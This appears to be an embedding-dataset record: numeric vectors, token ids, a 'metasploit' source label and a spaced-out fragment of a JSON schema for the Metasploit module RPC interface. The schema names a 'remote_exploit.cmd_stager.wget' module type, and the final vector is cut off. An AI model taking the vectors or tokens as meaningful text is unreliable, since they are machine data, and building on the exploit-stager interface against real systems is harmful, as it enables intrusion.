0.00899758655577898, -0.8133586049079895, -0.013688046485185623, 0.28353655338287354, 0.7213533520698547, -0.24298445880413055, -0.19336555898189545, -0.3503420650959015, 0.03374688699841499, 0.5504965782165527, -0.7318098545074463, -0.6528493762016296, -0.628772497177124, 0.11289074271917343, 0.6543416380882263, -0.08657243847846985, -0.2605212330818176, 0.5529991388320923, 0.05839589610695839, 0.8916845321655273, -0.06041821464896202, -0.06983932107686996, -0.32820045948028564, -0.6746046543121338, -0.12564484775066376, 0.4443425238132477, -0.777764618396759, 0.34377169609069824, 0.2606460154056549, 0.4696539342403412, -0.3911895155906677, -0.29314830899238586, 0.06034541875123978, 0.08890556544065475, -0.2754606604576111, 0.6233569383621216, 0.026400716975331306, 0.2226562798023224, 0.537282407283783, 0.7842894792556763, 0.02139996364712715, 0.2505536377429962, -0.2886953055858612, 0.4518919885158539, 0.3424762189388275, -0.08438247442245483, -0.4717235565185547, -0.17043590545654297, 0.19597025215625763, 0.007893691770732403, -0.17616936564445496, -0.5346764326095581, -0.250291645526886, 0.7006561160087585, 0.6011024713516235, -0.35356464982032776, -0.764065682888031, 0.7227810621261597, -0.08451620489358902, -0.3870992958545685, 0.41802579164505005, 0.052206769585609436, -0.06888969242572784, 0.46787649393081665, 0.7767384052276611, 0.6265246272087097, -0.42660441994667053, -0.19967220723628998, -0.8625572323799133, -0.15680719912052155, 0.015868499875068665, 0.21767276525497437, -0.11871727555990219, 0.21982775628566742, 0.758863091468811, 0.08629944175481796, 0.6095474362373352, -1.0095542669296265, -0.002931103575974703, 0.18665367364883423, 0.010054518468677998, 1.0616188049316406, -0.043261896818876266, 0.13830456137657166, -0.39566999673843384, 0.15118660032749176, -0.5233253836631775, 0.39393019676208496, 0.005940888077020645, 0.056916192173957825, 0.42281901836395264, -0.19484810531139374, -0.31396740674972534, 0.09188850969076157, -0.10987209528684616, 0.1857277750968933, 0.0133236488327384, -0.2531116306781769, -0.01181858405470848, 0.06051114574074745, -0.34778693318367004, 0.36284345388412476, -0.43527305126190186, 0.39721542596817017, -0.4597938358783722, -0.44760552048683167, -0.30621257424354553, 0.048814184963703156, 0.2497761845588684, 0.17702989280223846, -0.14204154908657074, 0.2239832878112793, 0.8840128779411316, 0.5967036485671997, -0.4058382511138916, 0.08505650609731674, 0.19611485302448273, -0.08684435486793518, 0.03201179578900337, 0.42424824833869934, 0.5903274416923523, 0.9064193367958069, 0.4615865647792816, 0.33533480763435364, 0.17357824742794037, -0.559851884841919, -0.005908868741244078, -0.13363587856292725, -0.04101479426026344, 0.7257900834083557, -0.46781447529792786, 0.5924866795539856, 0.30496588349342346, -0.41920042037963867, -0.5687248110771179, -0.20593765377998352, -0.021705010905861855, -1.0422585010528564, -0.6331329345703125, 0.6233484148979187, -0.012737155891954899, 0.5636472105979919, -0.002912828465923667, 0.19617995619773865, 0.2821461856365204, 0.7534530758857727, -0.1078341156244278, 0.6435144543647766, 0.6138178110122681, 0.05302943289279938, -0.6674022674560547, 0.7703765034675598, 0.18426558375358582, -0.4525422155857086, -0.7598746418952942, 0.4432782828807831, -0.04246226325631142, 0.1639467030763626, -0.10862027108669281, 0.09220236539840698, 0.24903401732444763, -0.1028953343629837, -0.7515970468521118, -0.6436241865158081, 0.2071298360824585, 0.304616242647171, 0.047483690083026886, 0.4419705867767334, 0.20080839097499847, 0.5738996267318726, 0.6019652485847473, 0.9777969121932983, 0.14566130936145782, -0.4634941816329956, 0.08769555389881134, 0.4622693955898285, 0.31635141372680664, 0.002308152848854661, -0.3218207061290741, 0.9027732610702515, 0.5411123633384705, 0.08824431896209717, 0.6323270797729492, 0.328821063041687, -0.2637283205986023, -0.4154655635356903, -0.08420783281326294, 0.26150989532470703, 0.04312030225992203, 1.251630425453186, 0.8645285964012146, -0.2690418064594269, -0.6819169521331787, -0.8532945513725281, 0.34684833884239197, 0.9342321157455444, -0.7971273064613342, -0.286216139793396, 0.38945332169532776, -0.1739831566810608, -0.8836460709571838, -0.17526157200336456, 0.06670273095369339, 0.8030051589012146, 0.23869499564170837, 0.20251339673995972, 0.10954432934522629, -0.23252813518047333, -0.5431564450263977, -0.06096822768449783, -0.45577454566955566, 0.02259228006005287, -0.8869051933288574, 0.5339969396591187, -0.34716692566871643, -0.29205965995788574, 0.5562213659286499, -0.2705563008785248, -0.22964398562908173, 0.2682951092720032, -0.03701181337237358, 0.4262170195579529, -0.14414922893047333, -0.36216869950294495, -0.5002831816673279, -0.06068728491663933, -0.20063672959804535, 0.7363411784172058, -0.7350664138793945, -0.04076003655791283, 0.07837419956922531, -0.1828864961862564, 0.244254469871521, -0.03608321025967598, 0.7811220288276672, 0.07289405912160873, 0.3300606906414032, -0.36324065923690796, 0.14375174045562744, -0.6471469402313232, 0.5914172530174255, -0.24019289016723633, -0.24298863112926483, 0.020285015925765038, 0.042414166033267975, -0.03043791465461254, 0.5294316411018372, 0.2703864574432373, -0.647549033164978, 0.5129864811897278, -0.17147839069366455, 0.23976856470108032, -0.7460571527481079, 0.10468252748250961, 0.2566452622413635, 0.057548269629478455, -0.1331508755683899, -0.7605488300323486, 0.14344197511672974, -0.6050994396209717, -0.15300777554512024, -0.48528268933296204, 0.01869964227080345, -0.07531386613845825, 0.622627317905426, -0.8523579239845276, 0.5662532448768616, -0.5330024361610413, -0.41635510325431824, 0.01870967634022236, -0.33124756813049316, 0.7908923029899597, 0.3315276801586151, 0.4638828635215759, -0.1785367876291275, 0.19830560684204102, 0.05869608372449875, 0.059589728713035583, 0.2042331099510193, -0.20322802662849426, 0.23265016078948975, 0.6686240434646606, -0.7353995442390442, 0.6871879696846008, 1.2424203157424927, -0.33971497416496277, -0.26264697313308716, -0.13600018620491028, -0.9059246182441711, 0.15409007668495178, 0.6996234655380249, 0.431776225566864, -0.005325532518327236, 1.1598758697509766, -0.5803518891334534, -0.3645715117454529, 0.3735302686691284, 0.304806649684906, 0.04554026201367378, 0.336999773979187, -0.4644526243209839, 0.11270936578512192, -0.5723446011543274, -0.7718619108200073, 0.46473392844200134, -0.14450401067733765, 0.5869135856628418, -0.2188277542591095, 0.9834526777267456, -0.06337691843509674, -0.18209829926490784, -0.2091636210680008, -0.10652132332324982, -0.3435664772987366, 0.484228253364563, 0.5094663500785828, 0.4451732337474823, -0.41127774119377136, 0.6839065551757812, 0.4509517550468445, 0.14129039645195007, 0.07254733890295029, -0.14210200309753418, 0.06803154945373535, -0.57274329662323, 0.12600833177566528, -0.040088459849357605, -0.39951422810554504, -0.0011891797184944153, -0.40960457921028137, 0.45118504762649536, -0.37832412123680115, -0.5429197549819946, -0.17659325897693634, 0.5307395458221436, 0.6526040434837341, 0.6205472946166992, 0.3073580265045166, 0.48981744050979614, 0.37051916122436523, -0.49722176790237427, 0.3548698425292969, -0.2632782757282257, 0.8735426664352417, -0.5568215250968933, 0.6316099166870117, -0.6532378196716309, 0.4239133894443512, -0.425921231508255, -0.39089876413345337, -0.4001588523387909, -0.09486423432826996, 0.15173956751823425, -0.01790682226419449, -0.3348177671432495, 0.031625863164663315, 0.25733280181884766, -0.2809734642505646, -0.28297898173332214, -0.6204830408096313, 0.059513434767723083, -0.004951655399054289, 0.7963597774505615, -0.37216439843177795, 0.4803512990474701, -0.8200193047523499, 0.17600016295909882, 0.29575589299201965, -0.10246431082487106, -0.491216778755188, -0.32948702573776245, -0.38793548941612244, -0.9470301270484924, 0.42578914761543274, 0.5212022662162781, -0.7062806487083435, -0.2470833957195282, -0.30651044845581055, -0.40890130400657654, 0.30074015259742737, -0.5157020092010498, -0.44511839747428894, 0.07779459655284882, 0.29264721274375916, 0.38624629378318787, 0.10170301795005798, -0.9860216379165649, -0.4477834701538086, 0.207193523645401, -0.4054315388202667, -0.3000779151916504, -0.8834218382835388, 0.40578824281692505, 0.31443071365356445, -0.4282146692276001, -0.07681312412023544, 0.18908105790615082, -0.599563479423523, -0.033590514212846756, -0.614633321762085, 0.29985129833221436, -0.8511401414871216, -0.4873761832714081, 0.9940007925033569, 0.3157276213169098, -0.10751765966415405, 0.713704526424408, 0.04346061497926712, -0.4625120759010315, -0.4057106077671051, -0.20805738866329193, -0.0692252665758133, 0.19952751696109772, -0.41160115599632263, 0.4702521562576294, 0.7110861539840698, -0.0676257386803627, -0.005137885920703411, -0.41418561339378357, 0.8139688372612, -0.11148577928543091, -0.15130352973937988, -0.4040987193584442, -0.5843579769134521, -0.12410476803779602, 0.11243272572755814, -0.12598513066768646, 0.16280047595500946, -0.10155712068080902, -0.319805383682251, -0.26958274841308594, 0.06745736300945282, -0.486602246761322, -0.9452459812164307, 0.16925856471061707, -0.7322654724121094, -0.19936193525791168, -0.1447666436433792, 0.3905782103538513, -0.23271878063678741, -0.3254370093345642, 0.46278613805770874, -0.37007179856300354, -0.11492373794317245, -0.40656834840774536, 0.474465548992157, -0.45877805352211, 0.15523386001586914, -0.5770680904388428, 0.1793755739927292, -0.36442577838897705, 0.12284576892852783, 0.31230494379997253, 0.42566919326782227, 0.34042516350746155, -0.4466197192668915, -0.367004930973053, 0.24755269289016724, 0.5957553386688232, -0.567324161529541, 0.04300302267074585, 0.5967180132865906, -0.8304489254951477, -0.0648169293999672, -0.1411982923746109, -0.28355562686920166, -0.566697359085083, -0.7723701596260071, 0.13869453966617584, 0.09447868913412094, 0.48785099387168884, -0.6521496772766113, -0.5262942910194397, -0.6038724780082703, 0.384927362203598, -0.01077237632125616, -0.8284943699836731, -0.03501579537987709, -0.6656942367553711, 0.8900938630104065, -0.03373762220144272, -0.0670461356639862, -0.10401321202516556, 0.23568324744701385, -0.16613732278347015, 0.45244303345680237, -0.12666942179203033, -0.11728383600711823, -0.222254678606987, -0.1336652785539627, 0.057036567479372025, 0.452261358499527, -0.05559052526950836, -0.13935242593288422, -0.10789289325475693, 0.34725838899612427, 0.06892348825931549, 0.791728675365448, -0.2074720412492752, 0.6574953198432922, 0.030572300776839256, -0.11135921627283096, -0.1398027092218399, -0.08099524676799774, -0.324796199798584, 0.1646425426006317, 0.7967300415039062, -0.5031924247741699, -0.908322811126709, 0.26987937092781067, 0.5176788568496704, 0.41241928935050964, -0.22886277735233307, -0.73468017578125, -0.16033753752708435, -0.9332717657089233, -1.0957984924316406, 0.42707839608192444, 0.16564591228961945, -0.409860223531723, 0.5250911116600037, 0.03530041500926018, 0.5015509724617004, -0.5496542453765869, 0.21689453721046448, 0.6537589430809021, 0.16502870619297028, 0.30174681544303894, -1.0135234594345093, 0.3184487521648407, 0.29721599817276, -0.0019214022904634476, 0.09011789411306381, -0.4148034155368805, 0.09002360701560974, -0.6243240833282471, -0.5641001462936401, -0.6050940155982971, -0.8277516961097717, -0.09720711410045624, 0.703750491142273, -0.05115870386362076, -0.08454792946577072, -0.11396097391843796, -0.55901038646698, -0.583977997303009, -0.2806144654750824, 0.29406672716140747, -0.21113531291484833, 0.46352213621139526, 0.20905375480651855, 0.5171453952789307, -0.9557942748069763, 0.16066351532936096, -0.3582969009876251, -0.19591377675533295, 0.6320544481277466, 0.376961886882782, -0.6970903873443604, 0.7240060567855835, 0.2894369661808014, -0.11112836748361588, -0.23445414006710052, -0.5581770539283752, -0.12197711318731308, 0.05501381307840347, -0.31930190324783325, -0.567962646484375, 0.5099079608917236, 0.10709039866924286, -0.04351029917597771, 0.22463878989219666, 0.1192912757396698, 0.048616521060466766, -0.24539312720298767, -0.22162583470344543, -0.2233038991689682, 0.29510563611984253, 0.6523253321647644, -0.321155309677124, -0.35629022121429443, -0.3986561894416809, -0.4552842974662781, 0.23955945670604706, 0.15484635531902313, 0.6601573824882507, 0.15175065398216248, 0.5535964369773865, -0.131022647023201, -0.47871023416519165, 0.5889278650283813, -0.1522216796875, 0.4827157258987427, 0.8065336346626282, 0.3328305184841156, -0.924470067024231, -0.27240854501724243, 0.12796099483966827, 0.14228685200214386, -0.11444495618343353, -0.027960825711488724, -0.21806718409061432, -0.037865493446588516, -0.2534225583076477, 0.31226658821105957, -0.7054781913757324, -0.3648339509963989, -1.3479667901992798, 0.13342788815498352, 0.1326107680797577, 0.06846331059932709, 0.30643489956855774, -0.2436584085226059, -0.6144519448280334, -0.2574123442173004, -0.2936915159225464, -0.36662745475769043, -0.07814820110797882, 0.16074487566947937, -0.6408869028091431, 0.22938044369220734, -0.6481571197509766, -0.12543170154094696, -0.8708335757255554, 0.13132137060165405, -0.3053351938724518, -0.6936231255531311, -0.4771411120891571, -0.09381385892629623, -0.46647578477859497, 0.37420907616615295, -0.9248385429382324, 0.7158593535423279, -0.41075173020362854, -0.3146784007549286, -0.0832023024559021, 0.5772966146469116, -0.4535135328769684, -0.167353093624115, 0.04604854807257652, 0.12641245126724243, -0.03940689563751221, 0.08928979933261871, 0.012727225199341774, -0.06066529080271721, 0.3100900948047638, 1.0503679513931274, -0.062291890382766724, -0.511637806892395, 0.12232955545186996, 0.4096819758415222, -0.4962565302848816, -0.2696737051010132, -0.3775041103363037, 0.006213558372110128, 0.6285282373428345, 0.2190355509519577, 0.4700179100036621, 0.6723196506500244, 0.5271207094192505, 0.18581849336624146, 0.17907273769378662, 0.8524527549743652, 0.1307879388332367, 0.23714888095855713, 0.2884341776371002, 0.16025114059448242, 0.10377641767263412, -0.3743026554584503, 0.36502283811569214, -0.18432572484016418, -0.03428499028086662, 0.2967541217803955, -0.21249458193778992, 0.03635406494140625, -0.5303092002868652, -0.5572991967201233, 0.08337732404470444, 0.546442449092865, 0.5800458788871765, 0.1868312954902649, 0.15491947531700134, -0.09583540260791779, -0.43896687030792236, 0.389510840177536, -0.7392160892486572, 0.01736309565603733, 0.340895414352417, -0.37439993023872375, -0.08137554675340652, -0.8284215927124023, -0.44611865282058716, -0.3233124017715454, 0.3634583055973053, 0.23285897076129913, 0.24816259741783142, 0.10009872913360596, 0.6600627303123474, 1.2386723756790161, -1.0716462135314941, -0.36974650621414185, -0.4820071756839752, 0.7140896916389465, -0.5473537445068359, -0.9790352582931519, 0.4968695342540741, 0.9020431637763977, 0.29799017310142517, -0.004625818692147732, -0.8150541186332703, -0.023756634443998337, -0.04047486558556557, 0.5351767539978027, -0.10231158137321472, 0.32008466124534607, -0.9731862545013428, 0.4447516202926636, -0.22807271778583527, -0.22621206939220428, -0.10012676566839218, -0.40348806977272034, 0.3230549991130829, -0.2492353767156601, -0.3632398247718811, 0.30958282947540283, -0.07437339425086975, 0.18046121299266815, 1.0396299362182617, 0.4643735885620117, 0.36702337861061096, -0.37527087330818176, -0.15016858279705048, -0.42142850160598755, 0.15888674557209015, 0.3174292743206024, 0.3361901044845581, -0.11316348612308502, 0.29682424664497375, 0.7738299369812012, -0.919052004814148, -0.2227793186903, 0.37334364652633667, 0.08690951019525528, -0.13593679666519165, 0.21909984946250916, 0.07823728770017624, 0.3624712824821472, -0.4160786271095276, -0.29855450987815857, 0.5075340867042542, 0.05971604213118553, -0.18177485466003418, -0.10419747978448868, -0.3441784679889679, 0.9455596208572388, -0.08711184561252594, 0.02050665393471718, -0.23928478360176086, -0.20945920050144196, 0.13259191811084747, 0.2805889844894409, -0.3102298974990845, 0.9248043298721313, 1.396302580833435, 0.3017132580280304, 0.04703680798411369, 0.004660697653889656, -0.07713814079761505, 0.4710572361946106, -0.03770873695611954, -0.11636807024478912, -0.4159466326236725, 0.6733653545379639, 0.17766492068767548, -0.45808887481689453, -0.500128448009491, 0.38776254653930664, 0.47204938530921936, -0.29270854592323303, 0.2581497132778168, 0.054992157965898514, 0.3610731065273285, -0.6651187539100647, 0.5847319960594177, -0.3679172992706299, 0.07302725315093994, 0.33548858761787415, -0.20361833274364471, 0.071340411901474, 0.9610375165939331, -0.07716277986764908, 0.5175601840019226, 0.12106666713953018, 1.1657718420028687, -0.37727034091949463, 0.29243579506874084, 0.042484864592552185, 0.12680990993976593, -0.42334386706352234, -0.002343822503462434, -0.04641668498516083, -0.15574923157691956, 0.4720800220966339, -0.0889233946800232, 0.7852993011474609, -0.3680514693260193, -0.06650721281766891, -0.928072452545166, 0.2911432385444641, -0.6332377195358276, -0.5500386357307434, -0.09166450798511505, -0.37232744693756104, -0.30994129180908203, -0.3702090084552765, -0.034947194159030914, 0.28573113679885864, 0.2504265606403351, 0.07212816923856735, -0.5218421220779419, -0.040465109050273895, -0.5523686408996582, 0.2065453976392746, 0.24860042333602905, -0.21088267862796783, 0.015119362622499466, 0.5444389581680298, -1.0352338552474976, -0.2057001292705536, -0.18105465173721313, -0.3685165345668793, -0.009304125793278217, 0.3213459253311157, 0.7825930714607239, 0.6858710050582886, -0.052335355430841446, -0.5031962990760803, -0.4794958531856537, 0.09222119301557541, 0.7983778119087219, 0.07617946714162827, 0.5090178847312927, -0.03360912203788757, -0.22657239437103271, -0.1918739527463913, -0.7996501326560974, 0.5834990739822388, -0.02033400721848011, -0.38461288809776306, -0.10218529403209686, -0.41172805428504944, -0.97007155418396, -0.5063080787658691, 0.8946757912635803, 0.442221462726593, 0.3663930892944336, 0.0806305930018425, -1.0769535303115845, -0.38383474946022034, -0.4735161066055298, 0.21406367421150208, -0.0006139373290352523, 0.3789866864681244, 0.012799236923456192, -0.5296812653541565, 0.5313570499420166, -1.202453374862671, 4.586599826812744, 1.1801072359085083, 0.03682519122958183, 0.2520565390586853, 0.12080400437116623, 0.539608895778656, 0.31065744161605835, -0.256564199924469, 0.5440366864204407, -0.26108118891716003, 0.48182412981987, 0.03154726326465607, 0.12262536585330963, 0.40117985010147095, 0.5400370955467224, 0.7393193244934082, -0.2062021791934967, 0.3439042866230011, 0.0916467234492302, -0.6811937689781189, -0.5453597903251648, -0.6318007707595825, -0.670032262802124, 1.2767282724380493, 0.026688428595662117, 0.5226609706878662, 0.211553692817688, -0.33610883355140686, -0.6377542614936829, -0.1459171324968338, -0.4634324014186859, -0.5116162896156311, 0.2569288909435272, -0.08181852102279663, -0.5660741329193115, -0.14816910028457642, -0.15619352459907532, -1.0144503116607666, -0.5196847319602966, -0.319851815700531, 0.8603872060775757, 0.3123786747455597, -0.25900450348854065, -0.7104640603065491, 0.17454774677753448, 0.3965662717819214, -0.04222925752401352, 0.5529053211212158, 0.6720851063728333, -0.7614325881004333, 0.5050169229507446, -0.28164610266685486, 0.31538763642311096, -0.22324725985527039, -0.204914852976799, 0.7441298961639404, 0.10337882488965988, -0.38403454422950745, -0.38861483335494995, 0.2793016731739044, 0.3342430591583252, -0.6927552223205566, 0.20845000445842743, -0.10553997755050659, -0.562053918838501, 0.4696110486984253, 0.25373902916908264, 0.2441016286611557, -0.03582864999771118, 0.2228468656539917, -0.1872897893190384, 0.532168984413147, -0.041426096111536026, -0.7941590547561646, 0.9892659783363342, 0.15044310688972473, 0.0967036783695221, -0.40467196702957153, 0.6429553627967834, -0.6090408563613892, -0.20998510718345642, -0.4535425007343292, -1.0587139129638672, 0.12969256937503815, 0.8398712277412415, 0.20103812217712402, -0.05317003279924393, -0.8786752820014954, -0.5012897253036499, 0.4594549834728241, 0.4523649513721466, 0.5904563665390015, -0.8322499990463257, -0.050138846039772034, 0.13827462494373322 ]
[ 2097, 2707, 1037, 2047, 2832, 2005, 2169, 3677, 1012, 2065, 1996, 16457, 2951, 23809, 2063, 5724, 2003, 2275, 1998, 2009, 2003, 2019, 9830, 11336, 1010, 2008, 2116, 6194, 2097, 2022, 2448, 2012, 1996, 2168, 2051, 1012, 1046, 3385, 1011, 1054, 15042, 17928, 10288, 16451, 2389, 14184, 10639, 2007, 18804, 13102, 4135, 4183, 2058, 2358, 8718, 1013, 2358, 26797, 2102, 1012, 1996, 4725, 1037, 11336, 2442, 10408, 2024, 6235, 1998, 2448, 1025, 3176, 4725, 2064, 2022, 17099, 1999, 1996, 9859, 9140, 1010, 2005, 2085, 5071, 2000, 2224, 1037, 16745, 1997, 1996, 7047, 2109, 2005, 2448, 1012, 18804, 13102, 4135, 4183, 22164, 4471, 1998, 2097, 10408, 3189, 1999, 1996, 2379, 2925, 1012, 1996, 28699, 2015, 2005, 2169, 4118, 2024, 2517, 2917, 2478, 1046, 3385, 1011, 8040, 28433, 1012, 2147, 2145, 3791, 2000, 2022, 2589, 4372, 17897, 15172, 9398, 4127, 1998, 9537, 2005, 1996, 7696, 1012, 6235, 2890, 15500, 1063, 1000, 1002, 8040, 28433, 1000, 1024, 1000, 8299, 1024, 1013, 1013, 1046, 3385, 1011, 8040, 28433, 1012, 8917, 1013, 8040, 28433, 1001, 1000, 1010, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 11498, 5244, 1000, 1010, 1000, 4118, 1000, 1010, 1000, 1046, 3385, 14536, 2278, 1000, 1010, 1000, 8909, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 1016, 1012, 1014, 1000, 1033, 1065, 1010, 1000, 8909, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 4118, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 6235, 1000, 1033, 1065, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1065, 1065, 1065, 3433, 1063, 1000, 1002, 8040, 28433, 1000, 1024, 1000, 8299, 1024, 1013, 1013, 1046, 3385, 1011, 8040, 28433, 1012, 8917, 1013, 8040, 28433, 1001, 1000, 1010, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 1046, 3385, 14536, 2278, 1000, 1010, 1000, 2765, 1000, 1010, 1000, 8909, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1063, 1000, 4372, 2819, 1000, 1024, 1031, 1000, 1016, 1012, 1014, 1000, 1033, 1065, 1010, 1000, 8909, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 2765, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 4874, 1000, 1010, 1000, 3223, 1000, 1024, 1031, 1000, 2171, 1000, 1010, 1000, 6412, 1000, 1010, 1000, 6048, 1000, 1010, 1000, 2828, 1000, 1010, 1000, 7047, 1000, 1010, 1000, 9859, 1000, 1033, 1010, 1000, 5144, 1000, 1024, 1063, 1000, 2171, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 6412, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 6048, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 9140, 1000, 1010, 1000, 5167, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1065, 1010, 1000, 3058, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 5164, 1000, 1065, 1010, 1000, 7604, 1000, 1024, 1063, 1000, 2828, 1000, 1024, 1000, 9140, 1000, 1010, 1000, 5167, 1000, 1024, 1063, 1000 ]
metasploit
119.txt
1
type " : " object ", " required " : [ " type ", " ref " ], " properties " : { " type " : { " type " : " string " }, " ref " : { " type " : " string " } } } }, " type " : { " enum " : [ " remote _ exploit. cmd _ stager. wget " ] }, " privileged " : { " type " : " boolean " }, " targets " : { " type " : " array ", " items " : { " type " : " object ", " required " : [ " platform ", " arch " ], " properties " : { " platform " : { " type " : " string " }, " arch " : { " type " : " string " } } } }, " options " : { " type " : " object ", " additionalproperties " : false, " patternproperties " : { " ^ [ ^ = ] * $ " : { " type " : " object ", " required " : [ " type ", " description ", " required ", " default " ], " properties " : { " required " : { " type " : " boolean " }, " default " : { " type " : [ " null ", " string ", " number ", " boolean ", " object ", " array " ] }, " description " : { " type " : " string " }, " type " : { " type " : " string " } } } } }, " capabilities " : { " type " : " array ", " items " : { " type " : " string " } } } } } } runrequest { " $ schema " : " http : / / json - schema. org / schema # ", " type " : " object ", " required " : [ " params ", " method ", " jsonrpc ", " id " ], " properties " : { " jsonrpc " : { " enum " : [ " 2. 0 " ] }, " id " : { " type " : " string " }, " method " : { " enum " : [ " run " ] }, " params " : { " type " : " object " " additionalproperties " : false, " patternpro
[ 0.06676767021417618, -0.9119467735290527, -0.2625901997089386, 0.08889472484588623, -0.31610989570617676, 0.6769596934318542, -0.6666531562805176, 0.21437938511371613, 0.1931266486644745, 0.34571483731269836, 0.6389052271842957, -0.36251571774482727, 0.6078838109970093, 0.18962864577770233, -1.0764819383621216, -0.252469539642334, -0.5565036535263062, -0.09017068147659302, -1.2984111309051514, 0.0021918911952525377, 0.23621457815170288, 0.7284911274909973, -1.355209469795227, -0.01787218265235424, -0.15658408403396606, 0.5579299926757812, 0.8084739446640015, 0.09592626988887787, 1.378221869468689, 1.144037127494812, 0.006257271859794855, -0.6160211563110352, 0.6844103932380676, -0.37245410680770874, -0.2893410325050354, -0.4325110614299774, 0.831023097038269, 0.14671382308006287, 0.30931809544563293, -0.6465393900871277, 0.5920390486717224, -0.5567910671234131, 0.13341987133026123, -0.8613590002059937, -1.3021905422210693, -0.621174156665802, 0.9735503792762756, -0.3901747465133667, 0.6105917096138, -0.39654743671417236, 0.6855868697166443, 0.002276529325172305, 0.28605470061302185, -0.5100364685058594, -0.44341033697128296, -0.05369323864579201, -0.1383647620677948, -0.49338868260383606, -0.6300199627876282, 0.28569456934928894, 0.09215761721134186, 0.5633813738822937, 0.012185093015432358, -0.907252311706543, -0.03616165742278099, 0.46735793352127075, 0.4506717622280121, -0.024048887193202972, -0.18821550905704498, -0.16442126035690308, -0.04881594330072403, 0.7461587190628052, -0.7689592838287354, -0.8087028861045837, -0.6839300394058228, -0.22140710055828094, 0.11960194259881973, 0.5673635601997375, -0.4050530791282654, 0.3533242642879486, -0.051502831280231476, 0.7074275612831116, 0.6545920372009277, -0.5529199242591858, -1.2844066619873047, 0.06790154427289963, -0.08154044300317764, 0.5511466860771179, -0.10558640211820602, 0.20809544622898102, -0.37787890434265137, 0.6974989175796509, -0.42301255464553833, -0.5144011378288269, 0.19004979729652405, 0.756763219833374, -0.06936367601156235, 0.6323859095573425, 0.7246738076210022, -0.2520146369934082, 0.48646777868270874, 0.9984685778617859, 0.03728969767689705, 0.3968319892883301, -0.2914505898952484, 0.6449700593948364, 0.11111313104629517, 0.31023555994033813, 0.02774907276034355, -0.41737255454063416, 0.8424050211906433, 0.00611622491851449, -0.2730835974216461, -0.3982904553413391, -0.1638442873954773, 0.4615161716938019, -0.15349003672599792, 0.07186783850193024, -0.33808380365371704, 0.9277130961418152, -0.7687883377075195, -0.08649003505706787, 0.7036641240119934, 0.1347074955701828, 1.1178717613220215, -0.01946677453815937, -0.017434699460864067, 0.5002658367156982, -0.4560924470424652, -0.493520051240921, 0.15851472318172455, -0.14695389568805695, 0.5332648754119873, 0.6438684463500977, -0.8345752954483032, 0.056137751787900925, 0.1749451607465744, 0.8703917860984802, 0.5489574670791626, -0.7177261710166931, -0.2814883887767792, -0.1884327232837677, 0.012848291546106339, 1.616381287574768, -0.2258610874414444, -0.1327430009841919, -0.17918871343135834, 0.1963634490966797, -0.6433880925178528, 0.44440191984176636, 0.17775693535804749, -0.5981520414352417, 0.4037925899028778, -0.0802810862660408, -0.5206415057182312, -0.5043389201164246, -0.06438048183917999, -0.04870035871863365, 0.313105046749115, 0.09756844490766525, 0.5701695084571838, 0.7596756815910339, -0.6847885847091675, 0.7000254988670349, -0.10346933454275131, 0.437206506729126, -0.7817627787590027, -0.42378300428390503, 0.042193952947854996, -0.15152643620967865, 0.0417858362197876, 0.06328366696834564, 0.2985609769821167, 0.34643492102622986, 1.2936253547668457, 0.7954521775245667, 0.7327274084091187, 0.24665915966033936, 0.4024404287338257, 0.46049994230270386, -1.3560959100723267, 0.48711901903152466, 0.28085556626319885, 0.8786755800247192, -0.22609354555606842, 0.5189048051834106, -0.1552332192659378, 0.26983824372291565, -0.4016028642654419, -0.6240887641906738, 0.19170506298542023, 0.6708574295043945, -0.11735248565673828, 1.1869473457336426, 0.3689936697483063, 0.05322033911943436, -1.135626196861267, -0.314029723405838, -0.16546393930912018, -1.0908559560775757, -0.20972293615341187, -0.4163188934326172, 0.00319225643761456, 0.7008316516876221, -0.717731773853302, 0.1314760446548462, 0.4640219509601593, 0.8987382054328918, -0.7535433769226074, 0.682280957698822, 0.22895781695842743, -0.08537900447845459, -0.2419232279062271, 0.09421387314796448, -0.005426202900707722, -0.8020541071891785, -0.7826804518699646, 1.017248511314392, 0.7370598316192627, 0.6932241320610046, -0.08399026840925217, 0.775854229927063, 0.6060073971748352, -0.020142441615462303, -0.04597746208310127, -0.022546203806996346, 0.15725752711296082, 0.841289222240448, -0.20250289142131805, 0.35101118683815, -0.6046942472457886, 0.6951526403427124, -0.3509531319141388, 1.1135506629943848, 0.4995187520980835, -0.5614078640937805, 0.49668818712234497, 0.22810107469558716, 0.5883803367614746, 0.4079866409301758, -0.5301560163497925, 0.8007416129112244, 1.0205782651901245, -0.490459680557251, 0.4776328206062317, 0.25817495584487915, 0.2439282387495041, -0.2461411952972412, -0.2951790690422058, 0.6650043725967407, -0.09157492220401764, 1.039440631866455, 0.21935714781284332, 0.29819807410240173, -0.77544766664505, -1.2039965391159058, 0.6251016855239868, 0.9078093767166138, -0.6797189116477966, -1.4053618907928467, 0.14539819955825806, -0.11167696863412857, -0.7633095383644104, -0.5602782368659973, -0.07185998558998108, 0.48824381828308105, -0.8955719470977783, -0.06359052658081055, -0.3406726121902466, -0.5937834978103638, -0.9432026147842407, -0.7024845480918884, -0.9618486166000366, -0.4936820864677429, -1.3026771545410156, -0.20840540528297424, 0.6016802787780762, -0.5897247195243835, 1.4162908792495728, -0.9222356677055359, -0.567818820476532, -0.396527498960495, 0.405269593000412, 